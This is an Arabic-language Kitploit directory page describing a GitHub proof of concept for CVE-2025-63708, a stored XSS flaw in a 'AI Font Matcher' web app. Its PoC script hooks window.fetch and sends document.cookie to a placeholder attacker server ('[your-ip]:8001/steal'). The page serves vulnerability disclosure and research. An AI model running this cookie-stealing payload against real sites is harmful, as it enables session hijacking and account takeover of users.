Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-63708 — استغلال إثبات المفهوم لـ CVE-2025-63708، وهي ثغرة XSS مخزنة في AI Font Matcher. يوضح سرقة ملفات تعريف الارتباط للجلسة عبر أسماء عائلات خطوط غير معقمة في استجابات جلب خطوط الويب. | Kitploit
أدوات/GitHubGitHub/dylandavis1/cve-2025-63708
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

استغلال إثبات المفهوم لـ CVE-2025-63708، وهي ثغرة XSS مخزنة في AI Font Matcher. يوضح سرقة ملفات تعريف الارتباط للجلسة عبر أسماء عائلات خطوط غير معقمة في استجابات جلب خطوط الويب.

عرض المستودع
12منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-63708

معرّف CVE: CVE-2025-63708
تاريخ الإسناد: 11-12-2025 نوع المشكلة: CWE-79 (Cross-Site Scripting)
المنتج المتأثر: “AI Font Matcher” (نُشر في 2025-10-10، nid=18425)
صفحة المنتج: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
تاريخ الاكتشاف: 2025-10-11
الباحث: Dylan Davis

الملخص

يعالج التطبيق البيانات القادمة من طلب webfonts دون تعقيم أسماء عائلات الخطوط. يمكن للمهاجم الذي يتحكم في هذه الاستجابة أو يعترضها حقن JavaScript يتم تنفيذها في سياق الصفحة، مما يتيح سرقة ملفات تعريف الارتباط الخاصة بالجلسة والاستيلاء على الحساب.

التأثير

  • تنفيذ JavaScript تعسفي في متصفح الضحية
  • استخراج ملفات تعريف ارتباط الجلسة (لاحظت ملفات تعريف ارتباط غير HttpOnly أثناء اختباري)
  • اختطاف الحساب وتنفيذ إجراءات نيابةً عن المستخدم

الإصدارات المتأثرة / النطاق

  • حزمة “AI Font Matcher” الموزّعة على SourceCodester اعتبارًا من 2025-10-10.

إعادة الإنتاج (PoC)

يوضح هذا الـ PoC تنفيذ التعليمات البرمجية عن طريق اعتراض window.fetch وإرجاع حمولة Web Fonts خاضعة للتحكم.

  1. شغّل التطبيق محليًا من المصدر الذي تم تنزيله.
  2. افتح DevTools → Console والصق الـ PoC أدناه (أو حمّل poc.js).
  3. أطلق واجهة المستخدم التي تجلب webfonts؛ ولاحظ ظهور alert(1).
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
تنزيل الأداة